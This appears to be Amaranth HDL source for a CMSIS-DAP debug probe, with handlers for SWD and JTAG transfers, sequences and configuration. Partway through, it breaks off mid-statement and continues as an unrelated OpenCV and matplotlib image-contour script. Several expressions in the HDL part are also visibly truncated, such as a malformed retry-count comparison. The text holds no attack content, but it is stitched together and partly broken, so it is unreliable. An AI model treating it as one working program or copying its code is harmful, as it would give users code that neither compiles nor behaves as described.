self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Connect_Done'\n\n if (DAP_CAPABILITIES&(1<<1)):\n with m.If ((((self.rxBlock.word_select(1,8))==0) & (DAP_CONNECT_DEFAULT==2)) |\n ((self.rxBlock.word_select(1,8))==2)):\n m.d.sync += [\n self.txBlock.word_select(0,16).eq(Cat(self.rxBlock.word_select(0,8),C(2,8))),\n self.dbgif.command.eq(CMD_SET_JTAG),\n self.txLen.eq(2),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Connect_Done'\n\n def RESP_Wait_Connect_Done(self, m):\n # Generic wait for inferior to process command\n with m.If((self.dbgif.go==1) & (self.dbg_done==0)):\n m.d.sync+=self.dbgif.go.eq(0)\n with m.If((self.dbgif.go==0) & (self.dbg_done==1)):\n m.next='RESPOND'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_Wait_Done(self, m):\n # Generic wait for inferior to process command\n with m.If((self.dbgif.go==1) & (self.dbg_done==0)):\n m.d.sync+=self.dbgif.go.eq(0)\n with m.If((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += self.txBlock.bit_select(8,8).eq(Mux(self.dbgif.perr,0xff,0))\n m.next='RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_Disconnect(self, m):\n # \n # Perform disconnect\n m.d.sync += [\n self.running.eq(0),\n self.connected.eq(0)\n ]\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_WriteABORT(self, m):\n # \n # Post abort code to register\n # TODO: Add ABORT for JTAG\n m.d.sync += [\n self.dbgif.command.eq(CMD_TRANSACT),\n self.dbgif.apndp.eq(0),\n self.dbgif.rnw.eq(0),\n self.dbgif.addr32.eq(0),\n self.dbgif.dwrite.eq(self.rxBlock.bit_select(16,32)),\n self.dbgif.go.eq(1)\n ]\n\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n def RESP_Delay(self, m):\n # \n # Delay for programmed number of uS\n m.d.sync += [\n self.dbgif.dwrite.eq( Cat(self.rxBlock.bit_select(16,8),self.rxBlock.bit_select(8,8))),\n self.dbgif.command.eq( CMD_WAIT ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n def RESP_ResetTarget(self, m):\n # \n # Reset the target\n m.d.sync += [\n self.txBlock.bit_select(8,16).eq(Cat(C(0,8),C(1,1),C(0,7))),\n self.txLen.eq(3),\n self.dbgif.command.eq( CMD_RESET ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n def RESP_SWJ_Pins_Setup(self, m):\n # \n # Control and monitor SWJ/JTAG pins\n m.d.sync += [\n self.dbgif.pinsin.eq( self.rxBlock.bit_select(8,16) ),\n self.dbgif.countdown.eq( self.txBlock.bit_select(24,32) )\n ]\n m.next = 'DAP_SWJ_Pins_PROCESS';\n\n def RESP_SWJ_Pins_Process(self, m):\n # Spin waiting for debug interface to do its thing\n with m.If (self.dbg_done):\n m.d.sync += [\n self.txBlock.word_select(1,8).eq(self.dbgif.pinsout),\n self.txLen.eq(2)\n ]\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_SWJ_Clock(self, m):\n # <0x11> \n # Set clock frequency for JTAG and SWD comms\n m.d.sync += [\n self.dbgif.dwrite.eq( self.rxBlock.bit_select(8,32) ),\n self.dbgif.command.eq( CMD_SET_CLK ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_SWJ_Sequence_Setup(self, m):\n # [n x .....]\n # Generate SWJ Sequence data\n m.d.sync += [\n # Number of bits to be transferred\n self.transferCount.eq(Mux(self.rxBlock.bit_select(8,8),Cat(self.rxBlock.bit_select(8,8),C(0,8)),C(256,16))),\n self.txb.eq(0),\n\n # Setup to have control over swdo, swclk and swwr (set for output), with clocks of 1 clock cycle\n self.dbgif.dwrite.eq(0),\n self.dbgif.pinsin.eq(0b0001_0011_0001_0000),\n self.bitcount.eq(0),\n self.dbgif.command.eq(CMD_PINS_WRITE)\n ]\n m.next = 'DAP_SWJ_Sequence_PROCESS'\n\n def RESP_SWJ_Sequence_Process(self, m):\n with m.Switch(self.txb):\n with m.Case(0): # Grab next octet(s) from stream ------------------------------------------------------------\n with m.If(self.streamOut.valid & self.streamOut.ready):\n m.d.sync += [\n self.tfrData.eq(self.streamOut.payload),\n self.txb.eq(1),\n self.busy.eq(1)\n ]\n with m.Else():\n m.d.sync += self.busy.eq(0)\n\n with m.Case(1): # Write the data bit -----------------------------------------------------------------------\n m.d.sync += [\n self.dbgif.pinsin[0:2].eq(Cat(C(0,1),self.tfrData.bit_select(0,1))),\n self.tfrData.eq(Cat(C(1,0),self.tfrData[1:8])),\n self.transferCount.eq(self.transferCount-1),\n self.dbgif.go.eq(1),\n self.bitcount.eq(self.bitcount+1),\n self.txb.eq(2)\n ]\n\n with m.Case(2): # Wait for bit to be accepted, then we can drop clk ----------------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += [\n self.dbgif.pinsin[0].eq(1),\n self.dbgif.go.eq(1),\n self.txb.eq(3)\n ]\n\n with m.Case(3): # Now wait for clock to be complete, and move to next bit ----------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n with m.If(self.transferCount!=0):\n m.d.sync += self.txb.eq(Mux(self.bitcount,1,0))\n with m.Else():\n m.next = 'DAP_Wait_Done'\n\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_SWD_Configure(self, m):\n # <0x13> \n # Setup configuration for SWD\n m.d.sync += [\n self.dbgif.dwrite.eq( self.rxBlock.bit_select(8,8) ),\n self.dbgif.command.eq( CMD_SET_SWD_CFG ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_JTAG_Configure(self, m):\n # n x [ ]\n # Set IR Length for Chain\n\n m.d.sync += [\n # We cope with up to 5 devices with IRLen of 1..32 bits\n self.dbgif.dwrite.eq( Cat( self.rxBlock.bit_select(11,5)-1,\n self.rxBlock.bit_select(19,5)-1,\n self.rxBlock.bit_select(27,5)-1,\n self.rxBlock.bit_select(35,5)-1,\n self.rxBlock.bit_select(43,5)-1,\n self.rxBlock.bit_select(51,5)-1,\n C(2,0) )\n ),\n self.dbgif.command.eq( CMD_SET_JTAG_CFG ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_JTAG_IDCODE_Setup(self, m):\n # \n # Request ID code for specified device\n m.d.sync += [\n self.dbgif.command.eq(CMD_JTAG_GET_ID),\n self.dbgif.dwrite.eq( self.rxBlock.bit_select(8,8) ),\n self.txLen.eq(6),\n self.txBlock.bit_select(16,32).eq(0),\n self.dbgif.go.eq(1)\n ]\n\n m.next = 'JTAG_IDCODE_Process'\n\n def RESP_JTAG_IDCODE_Process(self, m):\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.Elif(self.dbg_done==1):\n m.d.sync += self.txBlock.bit_select(16,32).eq(self.dbgif.dread)\n m.next = \"RESPOND\"\n\n # -------------------------------------------------------------------------------------\n def RESP_TransferConfigure(self, m):\n # \n # Configure transfer parameters\n m.d.sync += [\n self.waitRetry.eq(self.rxBlock.bit_select(16,16)),\n self.matchRetry.eq(self.rxBlock.bit_select(32,16)),\n\n # Send idleCycles to layers below\n self.dbgif.dwrite.eq(self.rxBlock.bit_select(8,8)),\n self.dbgif.command.eq(CMD_SET_TFR_CFG),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_Transfer_Setup(self, m):\n # <0x05> ]\n # Triggered at start of a Transfer data sequence\n # We have the command, index and transfer count, need to set up to get the transfers\n\n m.d.sync += [\n self.dapIndex.eq(self.rxBlock.bit_select(8,8)),\n self.transferCount.eq(self.rxBlock.bit_select(16,8)),\n self.tfrram.adr.eq(0),\n self.busy.eq(1),\n self.txb.eq(0)\n ]\n\n # Filter for case someone tries to send us no transfers to perform\n # in which case we send back a good ack!\n with m.If(self.rxBlock.bit_select(16,8)!=0):\n m.next = 'DAP_Transfer_PROCESS'\n with m.Else():\n m.d.sync += [\n self.txBlock.word_select(2,8).eq(C(1,8)),\n self.busy.eq(0),\n self.txLen.eq(3)\n ]\n m.next = 'RESPOND'\n\n\n def RESP_Transfer_Process(self, m):\n m.d.comb += self.tfrram.dat_w.eq(self.dbgif.dread)\n\n # By default we don't want to receive any more stream data\n m.d.sync += self.busy.eq(1)\n\n with m.Switch(self.txb):\n with m.Case(0): # Get transfer request from stream, or the previous one if the post is finishing ----------\n with m.If(~(self.streamOut.valid & self.streamOut.ready)):\n m.d.sync += self.busy.eq(0)\n with m.Else():\n m.d.sync += [\n self.tfrReq.eq(self.streamOut.payload),\n self.retries.eq(0)\n ]\n\n # This is a good transaction from the stream, so record the fact it's in flow\n m.d.sync += self.txBlock.word_select(1,8).eq(self.txBlock.word_select(1,8)+1)\n\n # So now go do the read or write as appropriate\n with m.If ((~self.streamOut.payload.bit_select(1,1)) |\n self.streamOut.payload.bit_select(4,1) |\n self.streamOut.payload.bit_select(5,1) ):\n\n # Need to collect the value\n m.d.sync += self.txb.eq(1)\n with m.Else():\n # It's a read, no value to collect\n m.d.sync += [\n self.txb.eq(5),\n self.busy.eq(1)\n ]\n\n with m.Case(1,2,3,4): # Collect the 32 bit transfer Data to go with the command ----------------------------\n with m.If(self.streamOut.valid & self.streamOut.ready):\n m.d.sync+=[\n self.tfrData.word_select(self.txb-1,8).eq(self.streamOut.payload),\n self.txb.eq(self.txb+1)\n ]\n\n with m.If(self.tfrReq.bit_select(5,1) & (self.txb==5)):\n # This is a match register write\n m.d.sync += [\n self.mask.eq(Cat(self.streamOut.payload,self.tfrData.bit_select(0,24))),\n self.txb.eq(0)\n ]\n with m.Else():\n m.d.sync +=self.busy.eq(0)\n\n with m.Case(5): # We have the command and any needed data, action it ---------------------------------------\n m.d.sync += [\n self.dbgif.command.eq(CMD_TRANSACT),\n self.dbgif.apndp.eq(self.tfrReq.bit_select(0,1)),\n self.dbgif.rnw.eq(self.tfrReq.bit_select(1,1)),\n self.dbgif.addr32.eq(self.tfrReq.bit_select(2,2)),\n self.dbgif.dwrite.eq(self.tfrData),\n self.dbgif.go.eq(1),\n self.txb.eq(self.txb+1),\n ]\n\n with m.Case(6): # We sent a command, wait for it to start being executed -----------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync+=[\n self.dbgif.go.eq(0),\n self.txb.eq(7)\n ]\n\n with m.Case(7): # Wait for command to complete -------------------------------------------------------------\n with m.If(self.dbg_done==1):\n # Write return value from this command into return frame\n m.d.sync += self.txBlock.word_select(2,8).eq(Cat(self.dbgif.ack,self.dbgif.perr)),\n\n # Now lets figure out how to handle this response....\n\n # If we're to retry, then lets do it\n with m.If(self.dbgif.ack==0b010):\n m.d.sync += [\n self.retries.eq(self.retries+1),\n self.txb.eq(Mux((self.retries1)):\n m.d.sync += self.txb.eq(0)\n with m.Else():\n with m.If(self.dbgif.postedMode):\n # Debug interface is in posting mode, better do one final read to collect the data\n m.d.sync += [\n self.tfrReq.eq(0x0E), # Read RDBUFF\n self.retries.eq(0),\n self.txb.eq(5)\n ]\n with m.Else():\n # Otherwise let's wrap up\n # All data have been processed, now lets send them back\n m.d.sync += self.txb.eq(8)\n\n with m.Case(8,9,10): # Transfer completed, start sending data back -----------------------------------------\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.txBlock.word_select(self.txb-8,8)),\n self.streamIn.valid.eq(1),\n self.txb.eq(self.txb+1),\n self.streamIn.last.eq(self.isV2 & (self.txb==10) & (self.tfrram.adr==0))\n ]\n\n with m.Case(11): # Initial data sent, send any remaining material ------------------------------------------\n m.next = 'UPLOAD_RXED_DATA'\n m.d.sync += [\n self.txb.eq(0),\n self.txedLen.eq((self.tfrram.adr*4)+3) # Record length of data to be returned\n ]\n\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_TransferBlock_Setup(self, m):\n # n x [ ])\n # Triggered at start of a TransferBlock data sequence\n # We have the command, index and transfer count, need to set up to get the transfers\n\n m.d.sync += [\n self.tfrram.adr.eq(0),\n self.dbgif.command.eq(CMD_TRANSACT),\n self.retries.eq(0),\n\n # DAP Index is 1 byte in\n self.dapIndex.eq(self.rxBlock.bit_select(8,8)),\n\n # Transfer count is 2 bytes in\n self.transferCount.eq(self.rxBlock.bit_select(16,16)),\n\n # Transfer Req is 4 bytes in\n self.dbgif.apndp.eq(self.rxBlock.bit_select(32,1)),\n self.dbgif.rnw.eq(self.rxBlock.bit_select(33,1)),\n self.dbgif.addr32.eq(self.rxBlock.bit_select(34,2)),\n\n # Set to one the number of responses sent back\n self.txBlock.bit_select(8,16).eq(C(1,16)),\n\n # Decide which state to jump to depending on if we have data\n self.txb.eq(Mux(self.rxBlock.bit_select(33,1),4,0)),\n\n # ...and start the retries counter for this first entry\n self.retries.eq(0)\n ]\n\n # Filter for case someone tries to send us no transfers to perform\n # in which case we send back a good ack!\n with m.If(self.rxBlock.bit_select(16,16)):\n m.next = 'DAP_TransferBlock_PROCESS'\n with m.Else():\n m.d.sync += [\n self.txBlock.bit_select(8,24).eq(C(1,24)),\n self.txLen.eq(4)\n ]\n m.next = 'RESPOND'\n\n def RESP_TransferBlock_Process(self, m):\n m.d.comb += self.tfrram.dat_w.eq(self.dbgif.dread)\n\n # By default we don't want to receive any more stream data, we're not writing to the ram\n # and it's not the end of a packet\n m.d.sync += self.busy.eq(1)\n\n with m.Switch(self.txb):\n with m.Case(0,1,2,3): # Collect the 32 bit transfer Data to go with the command ----------------------------\n with m.If(self.streamOut.ready & self.streamOut.valid):\n m.d.sync+=[\n self.tfrData.word_select(self.txb,8).eq(self.streamOut.payload),\n self.txb.eq(self.txb+1),\n ]\n with m.Else():\n m.d.sync +=self.busy.eq(0)\n\n with m.Case(4): # We have the command and any needed data, action it ---------------------------------------\n m.d.sync += [\n self.dbgif.dwrite.eq(self.tfrData),\n self.dbgif.go.eq(1),\n self.retries.eq(self.retries+1),\n self.txb.eq(5)\n ]\n\n with m.Case(5): # Wait for command to be accepted ----------------------------------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n m.d.sync += self.txb.eq(6)\n\n with m.Case(6): # We sent a command, wait for it to start being executed -----------------------------------\n with m.If(self.dbg_done==1):\n # Write return value from this command into return frame\n m.d.sync += self.txBlock.bit_select(24,8).eq(Cat(self.dbgif.ack, self.dbgif.perr))\n\n # Now lets figure out how to handle this response\n\n # If we're to retry, then let's do it\n with m.If(self.dbgif.ack==0b010):\n m.d.sync += self.txb.eq(Mux((self.retries1)):\n m.d.sync += [\n self.retries.eq(0),\n self.txBlock.bit_select(8,16).eq(self.txBlock.bit_select(8,16)+1),\n self.txb.eq(Mux(self.dbgif.rnw,4,0))\n ]\n\n with m.Else():\n with m.If(self.dbgif.postedMode):\n # Debug interface is in posting mode, better do one more read to collect the data\n m.d.sync += [\n self.dbgif.rnw.eq(1), # Read RDBUFF\n self.retries.eq(0),\n self.dbgif.apndp.eq(0),\n self.dbgif.addr32.eq(3),\n self.txb.eq(4)\n ]\n with m.Else():\n # Otherwise lets wrap up\n m.d.sync += [\n # Only need to increment transfer count ram position if this was a read\n #self.transferCount.eq(self.tfrram.adr+self.dbgif.rnw),\n #self.tfrram.adr.eq(0),\n self.txb.eq(7)\n ]\n\n with m.Case(7,8,9,10): # Transfer completed, start sending data back ---------------------------------------\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.txBlock.word_select(self.txb-7,8)),\n self.streamIn.valid.eq(1),\n self.txb.eq(self.txb+1),\n # End of transfer if there are no data to return\n self.streamIn.last.eq(self.isV2 & (self.txb==10) & (self.dbgif.rnw==0))\n ]\n\n with m.Case(11): # Initial data sent, decide what to do next ----------------------------------------------\n m.d.sync += [\n self.txb.eq(0),\n self.txedLen.eq((self.tfrram.adr*4)+4) # Record length of data that will be returned\n ]\n m.next = 'UPLOAD_RXED_DATA'\n\n def RESP_Transfer_Complete(self, m):\n # Complete the process of returning data collected via either Transfer_Process or\n # TransferBlock_Process. Data count to be transferred is in self.transferCount and\n # the payload is in the tfrram.\n\n m.d.sync += self.busy.eq(1)\n\n with m.Switch(self.txb):\n with m.Case(0): # Prepare transfer ------------------------------------------------------------------------\n with m.If(self.tfrram.adr!=0):\n m.d.sync += [\n self.transferCount.eq(self.tfrram.adr),\n self.tfrram.adr.eq(0),\n self.txb.eq(1)\n ]\n with m.Else():\n m.d.sync += self.txb.eq(7)\n\n with m.Case(1): # Wait for ram to propagate through -------------------------------------------------------\n m.d.sync += self.txb.eq(2)\n\n with m.Case(2): # Collect transfer value from RAM store ---------------------------------------------------\n m.d.sync += [\n self.transferCount.eq(self.transferCount-1),\n self.streamIn.payload.eq(self.tfrram.dat_r.word_select(0,8)),\n self.txb.eq(3)\n ]\n\n with m.Case(3,4,5,6): # Send 32 bit value to outgoing stream -------------------------------------------\n m.d.sync += self.streamIn.valid.eq(1)\n with m.If(self.streamIn.ready & self.streamIn.valid):\n m.d.sync += [\n self.txb.eq(self.txb+1),\n self.streamIn.payload.eq(self.tfrram.dat_r.word_select(self.txb-2,8)),\n # 5 because of pipeline\n self.streamIn.last.eq(self.isV2 & (self.transferCount==0) & (self.txb==5)),\n self.streamIn.valid.eq(self.txb!=6)\n ]\n\n with m.Case(7): # Finished this send ---------------------------------------------------------------------\n with m.If(self.streamIn.ready):\n with m.If(self.transferCount==0):\n with (m.If(self.isV2)):# | (self.txedLen==DAP_V1_MAX_PACKET_SIZE))):\n m.next = 'IDLE'\n with m.Else():\n m.next = 'V1PACKETFILL'\n with m.Else():\n m.d.sync += [\n self.txb.eq(1),\n self.tfrram.adr.eq(self.tfrram.adr+1)\n ]\n\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_JTAG_Sequence_Setup(self,m):\n # Triggered at the start of a RESP JTAG Sequence\n # There are data to receive at this point, and potentially bytes to transmit\n\n # Collect how many sequences we'll be processing, then move to get the first one\n m.d.sync += [\n self.seqCount.eq(self.rxBlock.word_select(1,8)),\n\n # Setup to have control over tms, tdi and swwr (set for output), with clocks of 1 clock cycle\n self.dbgif.dwrite.eq(0),\n\n # Just for now take over reset as well\n self.dbgif.pinsin.eq(0b0001_0111_0001_0000),\n self.dbgif.command.eq(CMD_PINS_WRITE),\n self.txb.eq(0)\n ]\n m.next = 'DAP_JTAG_Sequence_PROCESS'\n\n\n def RESP_JTAG_Sequence_PROCESS(self,m):\n m.d.sync += [\n self.busy.eq(1),\n self.streamIn.valid.eq(0)\n ]\n\n\n m.d.sync += self.can.eq(0)\n\n with m.Switch(self.txb):\n\n # -------------- # Send frontmatter\n with m.Case(0):\n with m.If(self.streamIn.ready):\n m.d.sync += [\n # Send frontmatter for reponse\n self.streamIn.payload.eq(DAP_JTAG_Sequence),\n self.streamIn.last.eq(0),\n self.streamIn.valid.eq(1),\n\n # This is the 'OK' that will be sent out next\n self.pendingTx.eq(0),\n\n # If there's nothing to be done then we are finished, otherwise start\n self.txb.eq(Mux(self.seqCount!=0,1,7))\n ]\n\n # --------------\n with m.Case(1): # Get info for this sequence\n with m.If(self.streamOut.ready & self.streamOut.valid):\n m.d.sync += [\n self.seqCount.eq(self.seqCount-1),\n self.tckCycles.eq(self.streamOut.payload.bit_select(0,6)),\n\n # Set the TMS bit\n self.dbgif.pinsin.bit_select(1,1).eq(self.streamOut.payload.bit_select(6,1)),\n\n # ...and decide if we want to capture what comes back\n self.tdotgt.eq(Mux(self.streamOut.payload.bit_select(7,1),\n Mux(self.streamOut.payload.bit_select(0,6),self.streamOut.payload.bit_select(0,6),0x40),0)),\n\n self.txb.eq(2)\n ]\n with m.Else():\n m.d.sync += self.busy.eq(0)\n\n # --------------\n with m.Case(2): # Waiting for TDI byte to arrive\n with m.If(self.streamOut.ready & self.streamOut.valid):\n m.d.sync += [\n self.tdiData.eq(self.streamOut.payload),\n self.tdiCount.eq(0),\n\n self.txb.eq(3)\n ]\n with m.Else():\n m.d.sync += self.busy.eq(0)\n\n # --------------\n with m.Case(3): # Setup for clocking out TDI, TCK->0\n m.d.sync += [\n # Put this bit ready to output\n self.dbgif.pinsin.bit_select(2,1).eq(self.tdiData.bit_select(self.tdiCount,1)),\n self.dbgif.pinsin.bit_select(0,1).eq(0),\n self.dbgif.go.eq(1),\n\n self.txb.eq(4)\n ]\n\n # -------------\n with m.Case(4): # Waiting until we can set TCK->1\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += [\n # Bit is established, change the clock\n self.dbgif.pinsin.bit_select(0,1).eq(1),\n self.dbgif.go.eq(1),\n\n self.txb.eq(5)\n ]\n\n # -------------\n with m.Case(5): # Sent this bit, waiting for clock 1 to complete\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += [\n # Adjust all the pointers\n self.tckCycles.eq(self.tckCycles-1),\n self.tdiCount.eq(self.tdiCount+1),\n\n self.txb.eq(6)\n ]\n\n # If there is a capture in process then do it\n with m.If(self.tdotgt):\n m.d.sync += [\n self.can.eq(self.dbgif.pinsout.bit_select(3,1)),\n self.tdoBuild.bit_select(self.tdoCount,1).eq(self.dbgif.pinsout.bit_select(3,1)),\n self.tdoCount.eq(self.tdoCount+1),\n self.tdotgt.eq(self.tdotgt-1)\n ]\n\n # -------------\n with m.Case(6): # ...if this capture is complete then send it back, then decide if there is still work to be done\n with m.If(((self.tdotgt==0) & (self.tdoCount!=0)) | (self.tdoCount==8)):\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.pendingTx),\n self.streamIn.valid.eq(1),\n self.pendingTx.eq(self.tdoBuild),\n self.tdoCount.eq(0),\n self.tdoBuild.eq(0)\n ]\n with m.Else():\n with m.If(self.tckCycles==0):\n # This is the last bit of the sequence, go get the next, or finish\n m.d.sync += self.txb.eq(Mux(self.seqCount,1,7))\n with m.Else():\n # otherwise set up the next bit to clock out, or a new byte\n m.d.sync += self.txb.eq(Mux(self.tdiCount==8,2,3))\n\n # -------------\n with m.Case(7): # Send the final byte, with last set\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.pendingTx),\n self.streamIn.last.eq(1),\n self.streamIn.valid.eq(1)\n ]\n m.next = 'IDLE'\n\n\n # -------------------------------------------------------------------------------------\n\n def elaborate(self,platform):\n done_cdc = Signal(2)\n self.dbg_done = Signal()\n\n m = Module()\n # Reset everything before we start\n\n m.d.sync += self.streamIn.valid.eq(0)\n m.d.comb += self.streamOut.ready.eq(~self.busy)\n\n m.submodules.tfrram = self.tfrram = WideRam()\n\n m.submodules.dbgif = self.dbgif = DBGIF(self.dbgpins)\n\n # Organise the CDC from the debug interface\n m.d.sync += done_cdc.eq(Cat(done_cdc[1],self.dbgif.done))\n m.d.comb += self.dbg_done.eq(done_cdc==0b11)\n\n # Latch the read data at the rising edge of done signal\n m.d.comb += self.tfrram.we.eq(done_cdc==0b10)\n\n with m.FSM(domain=\"sync\") as decoder:\n with m.State('IDLE'):\n m.d.sync += [ self.txedLen.eq(0), self.busy.eq(0) ]\n\n # Only process if this is the start of a packet (i.e. it's not overrrun or similar)\n with m.If(self.streamOut.valid & self.streamOut.ready & self.streamOut.first):\n m.next = 'ProtocolError'\n m.d.sync += self.rxedLen.eq(1)\n m.d.sync += self.rxBlock.word_select(0,8).eq(self.streamOut.payload)\n\n # Default return is packet name followed by 0 (no error)\n m.d.sync += self.txBlock.word_select(0,16).eq(Cat(self.streamOut.payload,C(0,8)))\n m.d.sync += self.txLen.eq(2)\n\n with m.Switch(self.streamOut.payload):\n with m.Case(DAP_Disconnect, DAP_ResetTarget, DAP_SWO_Status, DAP_TransferAbort):\n m.d.sync+= [ self.rxLen.eq(1), self.busy.eq(1) ]\n # This still goes to RxParams as a common entry, but then it dispatches immediately\n # from there as there are no params to rx\n m.next='RxParams'\n\n with m.Case(DAP_Info, DAP_Connect, DAP_SWD_Configure, DAP_SWO_Transport, DAP_SWJ_Sequence,\n DAP_SWO_Mode, DAP_SWO_Control, DAP_SWO_ExtendedStatus, DAP_JTAG_IDCODE, DAP_JTAG_Sequence):\n m.d.sync+=self.rxLen.eq(2)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_HostStatus, DAP_SWO_Data, DAP_Delay, DAP_JTAG_Configure, DAP_Transfer):\n m.d.sync+=self.rxLen.eq(3)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_SWO_Baudrate, DAP_SWJ_Clock, DAP_TransferBlock):\n m.d.sync+=self.rxLen.eq(5)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_WriteABORT, DAP_TransferConfigure):\n m.d.sync+=self.rxLen.eq(6)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_SWJ_Pins):\n m.d.sync+=self.rxLen.eq(7)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_SWD_Sequence):\n with m.If(~self.streamOut.last):\n m.next = 'DAP_SWD_Sequence_GetCount'\n\n with m.Case(DAP_ExecuteCommands):\n with m.If(~self.streamOut.last):\n m.next = 'DAP_ExecuteCommands_GetNum'\n\n with m.Case(DAP_QueueCommands):\n\n with m.If(~self.streamOut.last):\n m.next = 'DAP_QueueCommands_GetNum'\n\n with m.Default():\n self.RESP_Invalid(m)\n\n #########################################################################################\n\n with m.State('RESPOND'):\n with m.If(self.txedLen 3000:\r\n cv2.drawContours(img_contours[i], contours, int(contourIndex[j]), (0,255,255), 3)\r\n cv2.drawContours(img_contours[i], [box], 0, (0,255,255), 3)\r\n isOffset = 1\r\n \r\n img_contours[i] = cv2.resize(img_contours [i], (int(img_contours[i].shape[1] /3), int(img_contours[i].shape[0]/3)))\r\n #print(i, \" :\", perimeter)\r\n cv2.imshow(\"a\",img_contours[i])\r\n cv2.waitKey()\r\n\r\n return isOffset\r\n \r\nprint(getOffset(cv2.imread(\"1_offset.PNG\")))\r\n\r\n\r\n #area_feature.append(max(area))\r\n #perimeter_feature = []\r\n #circularity_feature = []\r\n #hasHole_feature = []\r\n #elongation_feature = []\r\n #print(\"area: \", max(area))\r\n #print(\"perimeter: \", perimeter)\r\n #print(\"circularity: \", circularity)\r\n\r\ntesting = 1\r\nif not testing:\r\n\r\n plt.subplot(4,2,1),plt.imshow(green[0])\r\n plt.subplot(4,2,2),plt.imshow(green_eq[0])\r\n\r\n plt.subplot(4,2,3),plt.imshow(green[1])\r\n plt.subplot(4,2,4),plt.imshow(green_eq[1])\r\n\r\n plt.subplot(4,2,5),plt.imshow(green[2])\r\n plt.subplot(4,2,6),plt.imshow(green_eq[2])\r\n\r\n plt.subplot(4,2,7),plt.imshow(green[3])\r\n plt.subplot(4,2,8),plt.imshow(green_eq[3])\r\n\r\n plt.show()\r\n\r\n plt.subplot(4,3,1),plt.imshow(thresh[0])\r\n plt.subplot(4,3,2),plt.imshow(thresh_eq[0])\r\n plt.subplot(4,3,3),plt.imshow(images[0])\r\n\r\n plt.subplot(4,3,4),plt.imshow(thresh[1])\r\n plt.subplot(4,3,5),plt.imshow(thresh_eq[1])\r\n plt.subplot(4,3,6),plt.imshow(images[1])\r\n\r\n plt.subplot(4,3,7),plt.imshow(thresh[2])\r\n plt.subplot(4,3,8),plt.imshow(thresh_eq[2])\r\n plt.subplot(4,3,9),plt.imshow(images[2])\r\n\r\n plt.subplot(4,3,10),plt.imshow(thresh[3])\r\n plt.subplot(4,3,11),plt.imshow(thresh_eq[3])\r\n plt.subplot(4,3,12),plt.imshow(images[3])\r\n\r\n plt.show()\r\n\r\n plt.subplot(4,3,1),plt.imshow(morph_open[0])\r\n plt.subplot(4,3,2),plt.imshow(morph_close[0])\r\n plt.subplot(4,3,3),plt.imshow(images[0])\r\n\r\n plt.subplot(4,3,4),plt.imshow(morph_open[1])\r\n plt.subplot(4,3,5),plt.imshow(morph_close[1])\r\n plt.subplot(4,3,6),plt.imshow(images[1])\r\n\r\n plt.subplot(4,3,7),plt.imshow(morph_open[2])\r\n plt.subplot(4,3,8),plt.imshow(morph_close[2])\r\n plt.subplot(4,3,9),plt.imshow(images[2])\r\n\r\n plt.subplot(4,3,10),plt.imshow(morph_open[3])\r\n plt.subplot(4,3,11),plt.imshow(morph_close[3])\r\n plt.subplot(4,3,12),plt.imshow(images[3])\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n plt.subplot(3,2,1),plt.imshow(green[4])\r\n plt.subplot(3,2,2),plt.imshow(green_eq[4])\r\n\r\n plt.subplot(3,2,3),plt.imshow(green[5])\r\n plt.subplot(3,2,4),plt.imshow(green_eq[5])\r\n\r\n plt.subplot(3,2,5),plt.imshow(green[6])\r\n plt.subplot(3,2,6),plt.imshow(green_eq[6])\r\n\r\n plt.show()\r\n\r\n 